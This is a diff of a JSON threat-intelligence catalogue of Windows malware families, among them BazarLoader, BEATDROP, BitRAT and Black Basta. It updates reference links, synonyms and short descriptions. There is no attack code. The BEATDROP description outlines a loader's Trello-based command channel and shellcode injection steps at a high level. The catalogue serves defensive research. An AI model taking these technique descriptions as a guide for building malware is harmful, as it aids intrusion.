+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://abnormalsecurity.com/blog/bazarloader-contact-form",
+ "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
"https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9",
+ "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://thedfirreport.com/2020/10/08/ryuks-return/",
"https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/",
- "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/"
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://twitter.com/Unit42_Intel/status/1458113934024757256",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
+ "https://unit42.paloaltonetworks.com/bazarloader-malware/",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
+ "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html",
+ "https://twitter.com/anthomsec/status/1321865315513520128",
+ "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors",
+ "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/",
+ "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/",
+ "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/",
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
+ "https://www.youtube.com/watch?v=uAkeXCYcl4Y",
+ "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/",
+ "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "https://intel471.com/blog/conti-leaks-ransomware-development",
+ "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/",
+ "https://johannesbader.ch/blog/yet-another-bazarloader-dga/",
+ "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf",
+ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II",
+ "https://unit42.paloaltonetworks.com/api-hammering-malware-families/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
+ "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html",
+ "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
+ "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/",
+ "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
+ "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/",
+ "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/",
+ "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/",
+ "https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/",
+ "https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://fr3d.hk/blog/campo-loader-simple-but-effective",
+ "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://forensicitguy.github.io/bazariso-analysis-advpack/",
+ "https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d",
+ "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
+ "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/"
],
"synonyms": [
"BEERBOT",
@@ -14043,13 +14919,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod",
+ "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
"https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176",
- "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
"https://twitter.com/James_inthe_box/status/1357009652857196546",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811"
+ "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware"
],
"synonyms": [
"NimzaLoader"
@@ -14064,10 +14940,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat",
- "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae",
"https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/",
- "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb"
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://medium.com/insomniacs/shadows-with-a-chance-of-blacknix-badc0f2f41cb",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://medium.com/insomniacs/shadows-in-the-rain-a16efaf21aae"
],
"synonyms": [],
"type": []
@@ -14102,24 +14979,35 @@
"value": "Beapy"
},
{
- "description": "",
+ "description": "According to Mandiant, BEATDROP is a downloader written in C that uses Atlassian's project management service Trello for C&C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process. Upon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread the thread points to NtCreateFile. The sample changes execution to shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep",
- "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d2fd10ba-5904-4679-8758-509b72b1aa2c",
+ "value": "BEATDROP"
+ },
+ {
+ "description": "Bedep has been mostly observed in ad-fraud campaigns, although it can also generally load modules for different tasks. It was dropped by the Angler Exploit Kit.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep",
+ "https://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/index.html",
+ "https://blog.talosintelligence.com/bedep-actor/",
+ "http://malware-traffic-analysis.net/2016/05/09/index.html",
+ "https://web.archive.org/web/20150524032716/http://asert.arbornetworks.com/bedeps-dga-trading-foreign-exchange-for-malware-domains/",
+ "https://malware.dontneedcoffee.com/2016/04/bedepantiVM.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "066f8ad3-0c99-43eb-990c-8fae2c232f62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b",
"value": "Bedep"
},
@@ -14220,18 +15108,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
"http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html",
- "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
"https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39",
- "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
"https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
+ "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref",
"https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en",
"http://www.xylibox.com/2015/04/betabot-retrospective.html",
- "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/"
+ "https://krabsonsecurity.com/2022/03/28/betabot-in-the-rearview-mirror/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt",
+ "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html",
+ "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39"
],
"synonyms": [
"Neurevt"
@@ -14271,9 +15159,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger",
+ "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/",
"https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf",
- "https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/"
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger"
],
"synonyms": [],
"type": []
@@ -14281,13 +15169,30 @@
"uuid": "ae3fe9fa-0717-413e-94fe-6e7b607e45c6",
"value": "BHunt"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian",
+ "https://twitter.com/malwrhunterteam/status/1558548947584548865",
+ "https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/",
+ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
+ "https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcc016ad-41a0-4bda-ad88-9542b5f560d9",
+ "value": "BianLian (Windows)"
+ },
{
"description": "Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows sytem processes and kills shadow copies.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware",
- "http://zirconic.net/2018/07/bi_d-ransomware/",
- "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/"
+ "http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/",
+ "http://zirconic.net/2018/07/bi_d-ransomware/"
],
"synonyms": [],
"type": []
@@ -14314,13 +15219,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates",
- "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/",
- "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/",
+ "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf",
"https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server",
- "https://habrahabr.ru/post/213973/",
- "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
"https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html",
- "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf"
+ "https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
+ "https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/",
+ "https://habrahabr.ru/post/213973/",
+ "https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/"
],
"synonyms": [],
"type": []
@@ -14348,9 +15253,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata",
"https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
"https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
- "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
+ "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
],
"synonyms": [],
"type": []
@@ -14376,8 +15281,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html"
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
],
"synonyms": [],
"type": []
@@ -14397,15 +15302,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "f1e05a12-ca50-41ab-a963-d7df5bcb141d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f98b4092-5f32-407c-9015-2da787d70c64",
"value": "Biscuit"
},
@@ -14414,11 +15310,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a",
- "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
"https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/",
- "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/"
+ "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/",
+ "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
],
"synonyms": [],
"type": []
@@ -14432,8 +15328,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock",
"https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/",
- "https://twitter.com/malwrhunterteam/status/1215252402988822529",
- "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview"
+ "https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview",
+ "https://twitter.com/malwrhunterteam/status/1215252402988822529"
],
"synonyms": [],
"type": []
@@ -14464,10 +15360,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat",
"https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
"https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
"https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
"https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan"
],
"synonyms": [],
@@ -14481,30 +15377,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat",
- "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
- "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
"https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/",
"https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/",
- "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
- "https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://community.riskiq.com/article/ade260c6",
- "https://www.youtube.com/watch?v=CYm3g4zkQdw",
+ "https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/",
"https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
- "https://asec.ahnlab.com/en/32781/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
"https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat",
- "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://community.riskiq.com/article/ade260c6",
"https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html"
+ "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/",
+ "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
+ "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
+ "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/",
+ "https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/",
+ "https://asec.ahnlab.com/en/32781/",
+ "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
+ "https://www.youtube.com/watch?v=CYm3g4zkQdw",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [],
"type": []
@@ -14513,7 +15410,7 @@
"value": "BitRAT"
},
{
- "description": "",
+ "description": "Kaspersky Labs characterizes Bizarro as yet another banking Trojan family originating from Brazil that is now found in other regions of the world. They have seen users being targeted in Spain, Portugal, France and Italy. Attempts have now been made to steal credentials from customers of 70 banks from different European and South American countries. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro",
@@ -14545,23 +15442,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/",
"https://gbhackers.com/black-basta-ransomware/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://securelist.com/luna-black-basta-ransomware/106950",
- "https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla",
- "https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html",
- "https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/",
- "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/",
- "https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
+ "https://securelist.com/luna-black-basta-ransomware/106950",
